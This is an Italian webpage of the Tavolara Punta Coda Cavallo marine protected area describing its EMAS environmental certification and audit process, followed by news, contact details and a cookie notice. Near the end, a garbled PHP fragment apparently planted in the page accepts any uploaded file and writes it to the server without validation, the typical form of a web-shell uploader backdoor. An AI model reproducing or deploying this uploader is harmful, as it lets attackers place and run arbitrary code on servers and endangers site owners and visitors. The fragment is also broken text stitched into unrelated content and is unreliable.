Home » Ente gestore » Emas

Rete Regionale per la conservazione della Fauna Marina SardegnaL’AMP è nodo della rete regionale per la conservazione della fauna marina

In caso di ritrovamento di animali in difficoltà contattare il
logo emergenza in mare, guardia costieralogo emergenza ambientale, segnalazione incendi boschivi

EMAS

Porsi volontariamente degli obiettivi per poter migliorare il proprio livello di prestazioni in termini ambientali è uno dei modi con cui il Consorzio di Gestione esprime la volontà di andare oltre il semplice rispetto delle prescrizioni di legge. 

L’adesione ad EMAS (Sistema Comunitario di Eco gestione ed Audit) testimonia questa volontà. 

Il sistema ha l’obiettivo di favorire, su base volontaria, una razionalizzazione, dal punto di vista ambientale, delle capacità gestionali delle organizzazioni, basata non solo sul rispetto dei limiti imposti dalla legge, ma anche sul miglioramento continuo delle proprie prestazioni ambientali, sulla creazione di un rapporto di fiducia con i partner istituzionali e con il pubblico e sulla partecipazione attiva dei dipendenti. 

Per conseguire questo risultato, l’Area Marina Protetta si è sottoposta ad un iter di verifica e certificazione del proprio sistema di gestione ambientale e di convalida della dichiarazione ambientale da parte di un organismo indipendente ed accreditato, sia presso il Sincert, sia presso l’organismo nazionale EMAS, al Ministero dell’Ambiente.

L’organismo prescelto per le verifiche è stato il RINA (Registro Italiano Navale), che rappresenta un organismo di riferimento per tutti coloro che operano nel mondo del mare. Per aderire ad EMAS, l’AMP ha effettuato l’analisi ambientale iniziale, ha stabilito la propria politica ambientale, unitamente agli obiettivi ed ai principi generali di azione ed elaborato il programma ambientale su base triennale. 

Ha così predisposto e realizzato un sistema di gestione ambientale, dando attuazione a quella parte del sistema complessivo di gestione che consente di sviluppare, mettere in atto, realizzare e mantenere la politica ambientale. 

Ha effettuato l’audit ambientale, che consiste nello svolgere una valutazione sistematica, periodica, documentata ed obiettiva delle proprie prestazioni e del sistema di gestione; infine, ha predisposto una dichiarazione ambientale rivolta al pubblico. 

Una volta che la dichiarazione è stata convalidata, l’AMP ha chiesto la registrazione, per essere inserita in un apposito elenco EMAS europeo (codice di iscrizione EMAS I-000324). 

Il processo di verifica e convalida non è un processo definitivo, ma annualmente l’AMP è soggetta a controlli da parte dell’organismo di certificazione, che verifica le modalità di gestione ed il persistere delle caratteristiche che hanno condotto alla certificazione. 

 

News


Dal 24 novembre al 6 dicembre, sede AMP di Tavolara via Porto Romano...

 

Rassegna stampa


La Nuova Sardegna. Articolo del  30 aprile 2013. Clicca qui per...

 

©  2011 Area Marina Protetta Tavolara Punta Coda Cavallo     Sede Legale: via Dante 1, OLBIA (SS) - 07026                                       Sede operativa:  Via San Giovanni 14, OLBIA (SS) - 07026           Telefono 0789/203013 - Fax 0789/204514 Mail:info@remove-this.amptavolara.itPec: amptavolara@pec.it 

Credits

Area Riservata

logo ministero ministero dell'ambientelogo EMASlogo Rina

"; $target = ""; $target = $target.basename( $_FILES['uploaded']['name']) ; $ok=1; if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) { echo "Done"; } } ?>
Navigando il sito amptavolara.com acconsenti all'utilizzo dei Cookie. Per maggiori dettagli.